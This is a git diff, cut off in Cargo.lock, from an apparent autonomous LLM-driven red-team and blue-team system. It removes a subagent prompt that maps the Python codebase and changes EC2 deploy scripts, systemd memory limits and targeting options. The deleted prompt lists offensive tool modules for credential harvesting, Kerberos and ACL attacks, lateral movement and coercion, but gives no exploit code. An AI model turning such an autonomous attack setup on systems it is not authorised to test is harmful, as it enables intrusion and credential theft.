diff --git a/.claude/agents/python-ares-expert.md b/.claude/agents/python-ares-expert.md deleted file mode 100644 index 4663ce3e..00000000 --- a/.claude/agents/python-ares-expert.md +++ /dev/null @@ -1,131 +0,0 @@ ---- -name: python-ares-expert -description: Expert on the Python ares codebase at ../ares (src/ares/). Use when you need to understand Python ares architecture, look up how something works in Python, find equivalent implementations, or answer questions about the original Python system before porting to Rust. -tools: Read, Glob, Grep, Bash -model: sonnet ---- - -You are an expert on the **Python ares codebase** located at `/Users/l/dreadnode/ares`. Your job is to answer questions about the Python implementation accurately by reading the actual source code. - -## Project Overview - -Ares is an autonomous security operations multi-agent system with: - -- **Red Team**: LLM-powered penetration testing with coordinator/worker architecture -- **Blue Team**: SOC alert investigation and threat hunting - -Built on the Dreadnode Agent SDK, rigging (LLM framework), and MITRE ATT&CK. - -## Codebase Layout - -``` -/Users/l/dreadnode/ares/ - src/ares/ - core/ # Core framework - dispatcher/ # Task dispatcher (routing, throttling, result processing, publishing) - worker/ # Worker agent (_worker.py, operations.py, prompts.py, dc_resolution.py) - orchestrator/ # Orchestrator (_orchestrator.py) - factories/ # Agent factories (red_agents.py, blue_factory.py) - replay/ # Deterministic replay - persistent_store/ # Persistent storage - blue_dispatcher/ # Blue team dispatcher - blue_worker/ # Blue team worker - models.py # ALL data models (Credential, Host, Hash, Target, SharedRedTeamState, etc.) - config.py # Configuration loading - state_backend.py # Redis state backend (red team) - blue_state_backend.py # Redis state backend (blue team) - task_queue.py # Redis task queue (red team) - blue_task_queue.py # Redis task queue (blue team) - redis_client.py # Redis client wrapper - recovery.py # Checkpoint/recovery - persistence.py # State serialization - workflows.py # Credential expansion workflows - engines.py # Question generation engines - correlation.py # Red-Blue correlation - evidence_validation.py # Evidence dedup/validation - k8s_executor.py # Kubernetes pod execution - lateral_analyzer.py # Graph-based lateral movement - messages.py # Inter-agent messages - orchestrator_client.py # Client for orchestrator communication - orchestrator_service.py # Orchestrator service pod - query_resilience.py # Query retry logic - remote.py # Remote K8s execution - templates.py # Jinja2 template loading - tracing.py # OpenTelemetry tracing - capability_registry.py # Agent capability registration - context_manager.py # LLM context window management - tool_retrieval.py # Dynamic tool loading - circuit_breaker.py # Circuit breaker pattern - tools/ - red/ # Red team tools - credential_discovery/ # discovery.py, harvesting.py, cracking.py, pilfering.py - reconnaissance.py # nmap, enum4linux, user/share enumeration - orchestrator.py # Dispatch functions - kerberos_attacks.py # Delegation, tickets, ADCS - lateral_movement.py # psexec, wmi, smb, evil-winrm - acl_attacks.py # bloodyAD, pywhisker, dacledit - privilege_escalation.py - coercion.py # PetitPotam, Coercer, relay - cve_exploits.py - reporting.py - common.py - blue/ # Blue team tools - investigation.py, grafana.py, query_templates.py, observability.py, actions.py, learning.py - shared/ - mitre.py # MITRE ATT&CK integration - agents/ - red/ # Red team agents 
(dynamic via factories) - blue/ - soc_investigator.py # SOC investigation orchestrator - integrations/ # Third-party integrations - reports/ # Report generation (investigation.py, redteam.py, blueteam.py) - eval/ # Evaluation framework - templates/ # Jinja2 prompt templates - redteam/agents/ # Per-role agent prompts (orchestrator.md.jinja, recon.md.jinja, etc.) - main.py # CLI entry point - cli_ops.py # CLI operations (loot, status, inject, etc.) - cli_blue_ops.py # Blue team CLI operations - cli_history.py # CLI history - tests/ # Test suite - docs/ - codemap.md # Full codebase map - red.md # Red team architecture (AUTHORITATIVE) - blue.md # Blue team workflow - config/ - multi-agent-production.yaml # Agent configurations -``` - -## Multi-Agent Architecture - -- **Orchestrator**: Central LLM coordinator, dispatches tasks, never executes tools directly -- **Workers**: RECON, CREDENTIAL_ACCESS, CRACKER, ACL, PRIVESC, LATERAL, COERCION -- **Communication**: Redis pub/sub + task queues -- **State**: Write-through cache (memory + Redis persistence) -- **Namespace**: `attack-simulation` in Kubernetes - -## Key Design Patterns - -1. **Write-through cache**: `SharedRedTeamState` in memory, persisted to Redis via `state_backend.py` -2. **Task queue**: Redis-based with priority routing in `task_queue.py` -3. **Result processing**: `dispatcher/result_processing.py` extracts credentials/hashes from tool output -4. **Publishing**: `dispatcher/publishing.py` broadcasts discovered credentials to all agents -5. **Recovery**: `recovery.py` can restore operation state from Redis checkpoints -6. **Factory pattern**: `factories/red_agents.py` maps AgentRole -> toolsets (ROLE_TOOLSETS) - -## How to Answer Questions - -1. **Always read the actual source files** before answering - don't guess from the layout alone -2. Start with the most relevant file based on the question -3. For architecture questions, read `docs/red.md` and `docs/codemap.md` -4. For model/data questions, read `src/ares/core/models.py` -5. For tool implementations, read the specific file in `src/ares/tools/red/` -6. For orchestration logic, read `src/ares/core/dispatcher/` and `src/ares/core/orchestrator/` -7. Be precise: include file paths, function names, and line numbers -8. When asked "how does X work", trace the full code path - -## Important Context - -- This codebase is being ported to Rust (the parent project at `/Users/l/dreadnode/ares-rust-cli/ares-rust/`) -- Questions will often be about understanding the Python implementation to inform the Rust port -- The Python codebase uses: rigging (LLM), loguru (logging), redis, kubernetes, cyclopts (CLI), pydantic (models) -- Domain conventions: `contoso.local` (primary), `fabrikam.local` (secondary), `192.168.58.x` subnet diff --git a/.taskfiles/ec2/Taskfile.yaml b/.taskfiles/ec2/Taskfile.yaml index bbe3514b..7528b8c1 100644 --- a/.taskfiles/ec2/Taskfile.yaml +++ b/.taskfiles/ec2/Taskfile.yaml @@ -161,21 +161,32 @@ tasks: "aws s3 cp s3://" + $bucket + "/" + $prefix + "/ares-src.tar.gz /tmp/ares-src.tar.gz", "tar -xzf /tmp/ares-src.tar.gz -C " + $build_dir, "cd " + $build_dir + " && cargo build --profile dev-deploy -p ares-cli 2>&1", - "cp " + $build_dir + "/target/dev-deploy/ares /usr/local/bin/ares && chmod +x /usr/local/bin/ares", + "SRC=" + $build_dir + "/target/dev-deploy/ares", + "if [ ! 
-f \"$SRC\" ]; then echo ERROR: build artifact missing at $SRC; exit 1; fi",
        "BUILD_RAW=$(sha256sum \"$SRC\"); BUILD_SHA=${BUILD_RAW%% *}",
        "echo Build SHA: $BUILD_SHA",
        "install -m 755 \"$SRC\" /usr/local/bin/ares",
        "DEPLOY_RAW=$(sha256sum /usr/local/bin/ares); DEPLOY_SHA=${DEPLOY_RAW%% *}",
        "echo Deploy SHA: $DEPLOY_SHA",
        "if [ \"$BUILD_SHA\" != \"$DEPLOY_SHA\" ]; then echo ERROR: deployed sha differs from build artifact build=$BUILD_SHA deploy=$DEPLOY_SHA; exit 1; fi",
        "echo Deployed: && ls -lh /usr/local/bin/ares" ]}' > "$PARAMS_FILE"
+      # Clean cargo builds on a t3.medium can run 15-25 min — the build
+      # cache may not survive an EC2 reboot, and incremental builds still
+      # need to relink. Allow 30 min total for both the SSM command itself
+      # and the local polling loop so we don't bail mid-build with an
+      # "InProgress" report.
      CMD_ID=$(aws ssm send-command \
        --profile "{{.EC2_PROFILE}}" \
        --region "{{.EC2_REGION}}" \
        --instance-ids "$INSTANCE_ID" \
        --document-name "AWS-RunShellScript" \
        --parameters "file://$PARAMS_FILE" \
-        --timeout-seconds 600 \
+        --timeout-seconds 1800 \
        --query "Command.CommandId" --output text)
-      # Poll for completion (up to 10 minutes)
-      for i in $(seq 1 300); do
+      # Poll for completion (up to 30 minutes)
+      for i in $(seq 1 900); do
        STATUS=$(aws ssm get-command-invocation \
          --profile "{{.EC2_PROFILE}}" \
          --region "{{.EC2_REGION}}" \
@@ -291,11 +302,25 @@
      fi
      ls -lh "$BIN_PATH"
+      # Pin the sha256 of what we're about to ship so the SSM deploy step can
+      # verify that the binary landing on /usr/local/bin/ares matches it
+      # exactly. Without this, the cp can silently fail to overwrite (ETXTBSY,
+      # immutable attribute, symlink redirection, prior deploy race) and the
+      # task still reports success.
+      if command -v sha256sum >/dev/null 2>&1; then
+        BUILD_SHA=$(sha256sum "$BIN_PATH" | awk '{print $1}')
+      else
+        BUILD_SHA=$(shasum -a 256 "$BIN_PATH" | awk '{print $1}')
+      fi
+      echo -e "{{.INFO}} Build SHA: $BUILD_SHA"
+      mkdir -p target/.deploy
+      echo "$BUILD_SHA" > target/.deploy/ares.sha256
+
      echo -e "{{.INFO}} Uploading binary to s3://{{.BCP_BUCKET}}/{{.S3_DEPLOY_PREFIX}}/..."
      aws s3 cp "$BIN_PATH" "s3://{{.BCP_BUCKET}}/{{.S3_DEPLOY_PREFIX}}/ares" \
        --profile "{{.EC2_PROFILE}}" --region "{{.EC2_REGION}}"
-      echo -e "{{.SUCCESS}} Binary staged in S3"
+      echo -e "{{.SUCCESS}} Binary staged in S3 (sha=$BUILD_SHA)"
  # Pull from S3 on EC2 via SSM + verify (skip for remote builds)
  - |
@@ -316,11 +341,30 @@
      echo -e "{{.INFO}} Pulling binaries from S3 to $INSTANCE_ID..."
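+      # Read back the sha pinned by the build step above
+      # (target/.deploy/ares.sha256). If the file is absent (e.g. a
+      # deploy-only run), EXPECTED_SHA stays empty and the remote check
+      # degrades to the staged-vs-deployed comparison only.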
+ EXPECTED_SHA="" + if [ -f target/.deploy/ares.sha256 ]; then + EXPECTED_SHA=$(cat target/.deploy/ares.sha256) + fi + PARAMS_FILE=$(mktemp) trap "rm -f $PARAMS_FILE" EXIT - jq -n --arg bucket "{{.BCP_BUCKET}}" --arg prefix "{{.S3_DEPLOY_PREFIX}}" \ - '{"commands": ["set -e; aws s3 cp s3://" + $bucket + "/" + $prefix + "/ares /usr/local/bin/ares; chmod +x /usr/local/bin/ares; echo Deployed:; ls -lh /usr/local/bin/ares"]}' \ - > "$PARAMS_FILE" + jq -n \ + --arg bucket "{{.BCP_BUCKET}}" \ + --arg prefix "{{.S3_DEPLOY_PREFIX}}" \ + --arg expected_sha "$EXPECTED_SHA" \ + '{"commands": [ + "set -ex", + "aws s3 cp s3://" + $bucket + "/" + $prefix + "/ares /tmp/ares.staged", + "STAGED_RAW=$(sha256sum /tmp/ares.staged); STAGED_SHA=${STAGED_RAW%% *}", + "echo Staged SHA: $STAGED_SHA", + "if [ -n \"" + $expected_sha + "\" ] && [ \"$STAGED_SHA\" != \"" + $expected_sha + "\" ]; then echo ERROR: S3 staged binary sha mismatch expected=" + $expected_sha + " staged=$STAGED_SHA; exit 1; fi", + "install -m 755 /tmp/ares.staged /usr/local/bin/ares", + "DEPLOY_RAW=$(sha256sum /usr/local/bin/ares); DEPLOY_SHA=${DEPLOY_RAW%% *}", + "echo Deploy SHA: $DEPLOY_SHA", + "if [ \"$STAGED_SHA\" != \"$DEPLOY_SHA\" ]; then echo ERROR: deployed sha differs from staged staged=$STAGED_SHA deploy=$DEPLOY_SHA; exit 1; fi", + "rm -f /tmp/ares.staged", + "echo Deployed: && ls -lh /usr/local/bin/ares" + ]}' > "$PARAMS_FILE" CMD_ID=$(aws ssm send-command \ --profile "{{.EC2_PROFILE}}" \ @@ -966,6 +1010,7 @@ tasks: SECRETS_ID: '{{.SECRETS_ID | default "ares/api-keys"}}' LLM_MODEL: '{{.LLM_MODEL | default ""}}' FLUSH_REDIS: '{{.FLUSH_REDIS | default "true"}}' + OPERATION_ID: '{{.OPERATION_ID | default ""}}' cmds: - | INSTANCE_ID=$(aws ec2 describe-instances \ @@ -981,7 +1026,11 @@ tasks: exit 1 fi - OP_ID="op-$(date -u +%Y%m%d-%H%M%S)" + if [ -n "{{.OPERATION_ID}}" ]; then + OP_ID="{{.OPERATION_ID}}" + else + OP_ID="op-$(date -u +%Y%m%d-%H%M%S)" + fi echo -e "{{.INFO}} Operation ID: $OP_ID" # Build target IPs JSON array @@ -1018,6 +1067,10 @@ tasks: ANTHROPIC_KEY=$(echo "$SECRETS" | jq -r .ANTHROPIC_API_KEY) GRAFANA_URL_VAL=$(echo "$SECRETS" | jq -r '.GRAFANA_URL // empty') GRAFANA_TOKEN_VAL=$(echo "$SECRETS" | jq -r '.GRAFANA_SERVICE_ACCOUNT_TOKEN // empty') + LOKI_URL_VAL=$(echo "$SECRETS" | jq -r '.LOKI_URL // empty') + if [ -z "$LOKI_URL_VAL" ]; then + LOKI_URL_VAL="{{.LOKI_URL}}" + fi DREADNODE_API_KEY=$(echo "$SECRETS" | jq -r '.DREADNODE_API_KEY // empty') OTEL_TRACES_ENDPOINT="{{.OTEL_TRACES_ENDPOINT}}" @@ -1035,6 +1088,9 @@ tasks: ENV_FILE_CMD="$ENV_FILE_CMD; echo 'GRAFANA_SERVICE_ACCOUNT_TOKEN=${GRAFANA_TOKEN_VAL}' >> /etc/ares/env" fi fi + if [ -n "$LOKI_URL_VAL" ]; then + ENV_FILE_CMD="$ENV_FILE_CMD; echo 'LOKI_URL=${LOKI_URL_VAL}' >> /etc/ares/env" + fi ENV_FILE_CMD="$ENV_FILE_CMD; echo 'ARES_DEPLOYMENT={{.EC2_DEPLOYMENT}}' >> /etc/ares/env" # OTEL: send traces to Alloy OTLP gateway → Tempo via HTTP/protobuf ENV_FILE_CMD="$ENV_FILE_CMD; echo 'OTEL_EXPORTER_OTLP_TRACES_ENDPOINT=${OTEL_TRACES_ENDPOINT}' >> /etc/ares/env" @@ -1053,6 +1109,7 @@ tasks: export ANTHROPIC_API_KEY='${ANTHROPIC_KEY}' export GRAFANA_URL='${GRAFANA_URL_VAL}' export GRAFANA_SERVICE_ACCOUNT_TOKEN='${GRAFANA_TOKEN_VAL}' + export LOKI_URL='${LOKI_URL_VAL}' export ARES_REDIS_URL=redis://127.0.0.1:6379 {{- if .LLM_MODEL}} export ARES_LLM_MODEL='{{.LLM_MODEL}}' diff --git a/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl b/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl index 619a4bc2..0e1ff0dc 100755 --- 
a/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl +++ b/.taskfiles/ec2/scripts/launch-orchestrator.sh.tmpl @@ -1,6 +1,11 @@ #!/bin/bash -# Launch ares orchestrator with environment variables -# Placeholders are substituted by the calling task via envsubst/sed +# Launch ares orchestrator in its own systemd transient unit so it (and any +# tool subprocesses it spawns) gets its own cgroup, separate from +# amazon-ssm-agent.service. Otherwise everything launched by SSM +# RunShellScript inherits SSM's cgroup and competes with it for memory — +# resulting in CONSTRAINT_MEMCG OOM-kills regardless of OOMScoreAdjust. +set -euo pipefail + export ARES_REDIS_URL=redis://127.0.0.1:6379 export RUST_LOG=info export ARES_OPERATION_ID='__ARES_PAYLOAD__' @@ -13,6 +18,7 @@ export DREADNODE_WORKSPACE='__DREADNODE_WORKSPACE__' export DREADNODE_PROJECT='__DREADNODE_PROJECT__' export GRAFANA_SERVICE_ACCOUNT_TOKEN='__GRAFANA_TOKEN__' export GRAFANA_URL='__GRAFANA_URL__' +export LOKI_URL='__LOKI_URL__' _llm_model='__ARES_LLM_MODEL__' if [ -n "$_llm_model" ] && [ "$_llm_model" = "${_llm_model#__}" ]; then export ARES_LLM_MODEL="$_llm_model" @@ -25,13 +31,57 @@ if [ -n "$_blue_model" ] && [ "$_blue_model" = "${_blue_model#__}" ]; then fi export ARES_DEPLOYMENT='__ARES_DEPLOYMENT__' export ARES_CONFIG=/etc/ares/config.yaml +export ARES_MAX_CONCURRENT_TASKS=8 _otel_endpoint='__OTEL_TRACES_ENDPOINT__' if [ -n "$_otel_endpoint" ] && [ "$_otel_endpoint" = "${_otel_endpoint#__}" ]; then export OTEL_EXPORTER_OTLP_TRACES_ENDPOINT="$_otel_endpoint" export OTEL_EXPORTER_OTLP_PROTOCOL='http/protobuf' export OTEL_RESOURCE_ATTRIBUTES='deployment.environment=staging,attack.team=red' fi + +mkdir -p /var/log/ares + +# Stop any prior orchestrator (transient unit or stray nohup process). +systemctl stop ares-orchestrator.service 2>/dev/null || true +systemctl reset-failed ares-orchestrator.service 2>/dev/null || true pkill -f 'ares orchestrator' 2>/dev/null || true sleep 1 -nohup /usr/local/bin/ares orchestrator >/var/log/ares/orchestrator.log 2>&1 & -echo "Orchestrator started (PID: $!)" + +# Spawn as a transient systemd service in system-ares.slice. --setenv=NAME +# (no value) inherits from current environment, preserving quoting that +# would otherwise be mangled by EnvironmentFile parsing of JSON payloads. 
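+# Note: the value-less --setenv=NAME form needs a reasonably recent systemd
+# (it landed around v248); on older hosts, pass explicit --setenv=NAME=value
+# pairs instead.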
+exec systemd-run \ + --unit=ares-orchestrator.service \ + --slice=system-ares.slice \ + --description="Ares Orchestrator (transient)" \ + --collect \ + --setenv=ARES_REDIS_URL \ + --setenv=RUST_LOG \ + --setenv=ARES_OPERATION_ID \ + --setenv=OPENAI_API_KEY \ + --setenv=ANTHROPIC_API_KEY \ + --setenv=DREADNODE_API_KEY \ + --setenv=DREADNODE_SERVER_URL \ + --setenv=DREADNODE_ORGANIZATION \ + --setenv=DREADNODE_WORKSPACE \ + --setenv=DREADNODE_PROJECT \ + --setenv=GRAFANA_SERVICE_ACCOUNT_TOKEN \ + --setenv=GRAFANA_URL \ + --setenv=LOKI_URL \ + --setenv=ARES_LLM_MODEL \ + --setenv=ARES_TOOL_DISPATCH \ + --setenv=ARES_BLUE_ENABLED \ + --setenv=ARES_BLUE_LLM_MODEL \ + --setenv=ARES_DEPLOYMENT \ + --setenv=ARES_CONFIG \ + --setenv=ARES_MAX_CONCURRENT_TASKS \ + --setenv=OTEL_EXPORTER_OTLP_TRACES_ENDPOINT \ + --setenv=OTEL_EXPORTER_OTLP_PROTOCOL \ + --setenv=OTEL_RESOURCE_ATTRIBUTES \ + --property=StandardOutput=append:/var/log/ares/orchestrator.log \ + --property=StandardError=append:/var/log/ares/orchestrator.log \ + --property=OOMScoreAdjust=-500 \ + --property=TasksMax=4096 \ + --property=MemoryHigh=8G \ + --property=MemoryMax=10G \ + /usr/local/bin/ares orchestrator diff --git a/.taskfiles/ec2/scripts/setup.sh b/.taskfiles/ec2/scripts/setup.sh index f073ecfd..858fcfd8 100755 --- a/.taskfiles/ec2/scripts/setup.sh +++ b/.taskfiles/ec2/scripts/setup.sh @@ -21,6 +21,46 @@ fi echo "=== Creating directories ===" mkdir -p /var/log/ares /etc/ares +echo "=== Removing legacy ares-worker@ unit (renamed in PR #226) ===" +if [ -f /etc/systemd/system/ares-worker@.service ]; then + for role in recon credential_access cracker acl privesc lateral coercion; do + systemctl disable --now "ares-worker@${role}.service" 2>/dev/null || true + done + rm -f /etc/systemd/system/ares-worker@.service +fi + +echo "=== Creating system-ares.slice with global memory cap ===" +cat >/etc/systemd/system/system-ares.slice <<'SLICE_EOF' +[Unit] +Description=Ares system slice (orchestrator + workers) +Before=slices.target + +[Slice] +MemoryMax=12G +MemoryHigh=10G +TasksMax=8192 +SLICE_EOF + +echo "=== Ensuring 4G swap file (OOM cushion) ===" +if [ ! -f /swapfile ] || [ "$(stat -c%s /swapfile 2>/dev/null || echo 0)" -lt 4000000000 ]; then + swapoff /swapfile 2>/dev/null || true + rm -f /swapfile + fallocate -l 4G /swapfile || dd if=/dev/zero of=/swapfile bs=1M count=4096 + chmod 600 /swapfile + mkswap /swapfile + swapon /swapfile + if ! grep -q '^/swapfile' /etc/fstab; then + echo '/swapfile none swap sw 0 0' >>/etc/fstab + fi +fi + +echo "=== Tuning OOM behavior (oom_kill_allocating_task, swappiness) ===" +cat >/etc/sysctl.d/90-ares.conf <<'SYSCTL_EOF' +vm.oom_kill_allocating_task = 1 +vm.swappiness = 10 +SYSCTL_EOF +sysctl -p /etc/sysctl.d/90-ares.conf >/dev/null + echo "=== Creating systemd worker template unit ===" cat >/etc/systemd/system/ares@.service <<'UNIT_EOF' [Unit] @@ -42,9 +82,19 @@ RestartSec=5 StandardOutput=append:/var/log/ares/%i.log StandardError=append:/var/log/ares/%i.log +# Contain child processes (netexec, hashcat, nmap, etc.) within this cgroup. +# Without these limits, runaway tool processes can OOM the entire system and +# take down the SSM agent (see: Apr 2026 incident). +Delegate=yes +Slice=system-ares.slice +MemoryHigh=1500M +MemoryMax=2G +TasksMax=256 + [Install] WantedBy=multi-user.target UNIT_EOF +systemctl daemon-reload echo "=== Installing cracking tools ===" if ! command -v hashcat >/dev/null 2>&1 || ! 
command -v john >/dev/null 2>&1; then diff --git a/.taskfiles/red/Taskfile.yaml b/.taskfiles/red/Taskfile.yaml index 73b2119a..b93cb879 100644 --- a/.taskfiles/red/Taskfile.yaml +++ b/.taskfiles/red/Taskfile.yaml @@ -19,12 +19,13 @@ tasks: # =========================================================================== multi: - desc: "Run multi-agent red team operation (usage: task red:multi [TARGET=dreadgoad] [DOMAIN=contoso.local] [TARGET_ENV=staging])" + desc: "Run multi-agent red team operation (usage: task red:multi [TARGET=dreadgoad] [DOMAIN=contoso.local] [TARGET_ENV=staging] [IPS=10.1.10.10,10.1.10.11])" silent: true vars: OPERATION_ID: '{{.OPERATION_ID | default ""}}' RESUME: '{{.RESUME | default "false"}}' TARGET_ENV: '{{.TARGET_ENV | default "staging"}}' + IPS: '{{.IPS | default ""}}' OPERATION_ID_COMPUTED: sh: | if [ -n "{{.OPERATION_ID}}" ]; then @@ -71,6 +72,14 @@ tasks: MODEL_OVERRIDE_ENV="ARES_MODEL_OVERRIDE={{.MODEL}}" fi + # When IPS is supplied, target IPs directly and skip EC2 Name-tag resolution + # (the orchestrator pod has no `aws` CLI). Otherwise default to AWS lookup. + if [ -n "{{.IPS}}" ]; then + TARGET_FLAGS="--ips {{.IPS}}" + else + TARGET_FLAGS="--resolve-targets --aws-profile {{.TARGET_PROFILE}} --aws-region {{.TARGET_REGION}}" + fi + # CLI auto-loads .env if present, or use --secrets-from 1password kubectl exec -i -n {{.K8S_NAMESPACE}} deploy/ares-orchestrator -- \ env $MODEL_OVERRIDE_ENV \ @@ -82,9 +91,7 @@ tasks: GRAFANA_URL="{{.GRAFANA_URL}}" \ ares --redis-url "{{.REDIS_URL}}" ops submit \ "{{.TARGET}}" "{{.DOMAIN}}" \ - --resolve-targets \ - --aws-profile "{{.TARGET_PROFILE}}" \ - --aws-region "{{.TARGET_REGION}}" \ + $TARGET_FLAGS \ --pin-active \ --operation-id "{{.OPERATION_ID_COMPUTED}}" \ --model "{{.MODEL}}" \ @@ -738,6 +745,7 @@ tasks: BLUE_ENABLED: '{{.BLUE_ENABLED | default "0"}}' BLUE_LLM_MODEL: '{{.BLUE_LLM_MODEL | default ""}}' EC2_DEPLOYMENT: '{{.EC2_DEPLOYMENT | default "alpha-operator-range"}}' + STRATEGY: '{{.STRATEGY | default "comprehensive"}}' RESOLVED_TARGETS: sh: | TARGET="{{.TARGET}}" @@ -867,7 +875,7 @@ tasks: # Build JSON payload for ARES_OPERATION_ID TARGET_IPS_JSON=$(echo "{{.RESOLVED_TARGETS}}" | tr ',' '\n' | sed 's/^/"/;s/$/"/' | paste -sd, - | sed 's/^/[/;s/$/]/') - ORCH_PAYLOAD="{\"operation_id\":\"{{.OPERATION_ID_COMPUTED}}\",\"target_domain\":\"{{.DOMAIN}}\",\"target_ips\":${TARGET_IPS_JSON},\"model\":\"{{.MODEL}}\"}" + ORCH_PAYLOAD="{\"operation_id\":\"{{.OPERATION_ID_COMPUTED}}\",\"target_domain\":\"{{.DOMAIN}}\",\"target_ips\":${TARGET_IPS_JSON},\"model\":\"{{.MODEL}}\",\"strategy\":\"{{.STRATEGY}}\"}" # Build orchestrator launch script from template ORCH_SCRIPT=$(mktemp) @@ -882,6 +890,7 @@ tasks: -e "s|__DREADNODE_PROJECT__|{{.DREADNODE_PROJECT}}|" \ -e "s|__GRAFANA_TOKEN__|${GRAFANA_SERVICE_ACCOUNT_TOKEN:-}|" \ -e "s|__GRAFANA_URL__|{{.GRAFANA_URL}}|" \ + -e "s|__LOKI_URL__|{{.LOKI_URL}}|" \ -e "s|__ARES_LLM_MODEL__|{{.MODEL}}|" \ -e "s|__ARES_BLUE_ENABLED__|{{.BLUE_ENABLED}}|" \ -e "s|__ARES_BLUE_LLM_MODEL__|{{.BLUE_LLM_MODEL}}|" \ diff --git a/.taskfiles/remote/orchestrator-wrapper-patch.json b/.taskfiles/remote/orchestrator-wrapper-patch.json index 9ee1be92..67009f79 100644 --- a/.taskfiles/remote/orchestrator-wrapper-patch.json +++ b/.taskfiles/remote/orchestrator-wrapper-patch.json @@ -8,7 +8,7 @@ "op": "replace", "path": "/spec/template/spec/containers/0/args", "value": [ - "echo \"ares orchestrator queue dispatcher starting\" >&2\nwhile true; do\n OP_REQUEST=$(RUST_LOG=error ares ops claim-next --timeout 30 
2>/dev/null | tail -n 1 || true)\n if [ -n \"$OP_REQUEST\" ]; then\n OP_ID=$(printf '%s\\n' \"$OP_REQUEST\" | sed -n 's/.*\"operation_id\"[[:space:]]*:[[:space:]]*\"\\([^\"]*\\)\".*/\\1/p')\n echo \"Starting operation: ${OP_ID:-unknown}\" >&2\n export ARES_OPERATION_ID=\"$OP_REQUEST\"\n ares orchestrator\n status=$?\n echo \"Operation ${OP_ID:-unknown} exited with status $status\" >&2\n fi\ndone" + "echo \"ares orchestrator queue dispatcher starting\" >&2\nwhile true; do\n OP_REQUEST=$(RUST_LOG=error ares ops claim-next --timeout 30 2>/dev/null | tail -n 1 || true)\n case \"$OP_REQUEST\" in *\"\\\"operation_id\\\"\"*) ;; *) OP_REQUEST=\"\" ;; esac\n if [ -n \"$OP_REQUEST\" ]; then\n OP_ID=$(printf '%s\\n' \"$OP_REQUEST\" | sed -n 's/.*\"operation_id\"[[:space:]]*:[[:space:]]*\"\\([^\"]*\\)\".*/\\1/p')\n if [ -z \"$OP_ID\" ]; then\n echo \"Skipping malformed op request\" >&2\n continue\n fi\n echo \"Starting operation: $OP_ID\" >&2\n export ARES_OPERATION_ID=\"$OP_REQUEST\"\n ares orchestrator\n status=$?\n echo \"Operation $OP_ID exited with status $status\" >&2\n fi\ndone" ] } ] diff --git a/Cargo.lock b/Cargo.lock index c3ce37e8..82d86d55 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -118,6 +118,7 @@ dependencies = [ "chrono", "clap", "dotenvy", + "hickory-resolver", "redis", "regex", "rstest", @@ -189,6 +190,7 @@ dependencies = [ "anyhow", "approx", "ares-core", + "base64", "chrono", "redis", "regex", @@ -602,6 +604,12 @@ dependencies = [ "hybrid-array", ] +[[package]] +name = "data-encoding" +version = "2.11.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a4ae5f15dda3c708c0ade84bfee31ccab44a3da4f88015ed22f63732abe300c8" + [[package]] name = "der" version = "0.7.10" @@ -674,6 +682,18 @@ dependencies = [ "serde", ] +[[package]] +name = "enum-as-inner" +version = "0.6.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a1e6a265c649f3f5979b601d26f1d05ada116434c87741c9493cb56218f76cbc" +dependencies = [ + "heck", + "proc-macro2", + "quote", + "syn", +] + [[package]] name = "equivalent" version = "1.0.2" @@ -998,6 +1018,51 @@ version = "0.4.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "7f24254aa9a54b5c858eaee2f5bccdb46aaf0e486a595ed5fd8f86ba55232a70" +[[package]] +name = "hickory-proto" +version = "0.24.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "92652067c9ce6f66ce53cc38d1169daa36e6e7eb7dd3b63b5103bd9d97117248" +dependencies = [ + "async-trait", + "cfg-if", + "data-encoding", + "enum-as-inner", + "futures-channel", + "futures-io", + "futures-util", + "idna", + "ipnet", + "once_cell", + "rand 0.8.6", + "thiserror 1.0.69", + "tinyvec", + "tokio", + "tracing", + "url", +] + +[[package]] +name = "hickory-resolver" +version = "0.24.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cbb117a1ca520e111743ab2f6688eddee69db4e0ea242545a604dce8a66fd22e" +dependencies = [ + "cfg-if", + "futures-util", + "hickory-proto", + "ipconfig", + "lru-cache", + "once_cell", + "parking_lot", + "rand 0.8.6", + "resolv-conf", + "smallvec", + "thiserror 1.0.69", + "tokio", + "tracing", +] + [[package]] name = "hkdf" version = "0.12.4" @@ -1316,6 +1381,19 @@ dependencies = [ "serde_core", ] +[[package]] +name = "ipconfig" +version = "0.3.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4d40460c0ce33d6ce4b0630ad68ff63d6661961c48b6dba35e5a4d81cfb48222" +dependencies = [ + "socket2", + "widestring", + "windows-registry", + 
"windows-result", + "windows-sys 0.61.2", +] + [[package]] name = "ipnet" version = "2.12.0" @@ -1468,6 +1546,12 @@ dependencies = [ "vcpkg", ] +[[package]] +name = "linked-hash-map" +version = "0.5.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0717cef1bc8b636c6e1c1bbdefc09e6322da8a9321966e8928ef80d20f7f770f" + [[package]] name = "linux-raw-sys" version = "0.12.1" @@ -1495,6 +1579,15 @@ version = "0.4.29" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "5e5032e24019045c762d3c0f28f5b6b8bbf38563a65908389bf7978758920897" +[[package]] +name = "lru-cache" +version = "0.1.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "31e24f1ad8321ca0e8a1e0ac13f23cb668e6f5466c2c57319f6a5cf1cc8e3b1c" +dependencies = [ + "linked-hash-map", +] + [[package]] name = "lru-slab" version = "0.1.2" @@ -2261,6 +2354,12 @@ dependencies = [ "web-sys", ] +[[package]] +name = "resolv-conf" +version = "0.7.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1e061d1b48cb8d38042de4ae0a7a6401009d6143dc80d2e2d6f31f0bdd6470c7" + [[package]] name = "ring" version = "0.17.14" @@ -3615,13 +3714,19 @@ dependencies = [ "wasite", ] +[[package]] +name = "widestring" +version = "1.2.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "72069c3113ab32ab29e5584db3c6ec55d416895e60715417b5b883a357c3e471" + [[package]] name = "winapi-util" version = "0.1.11" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = 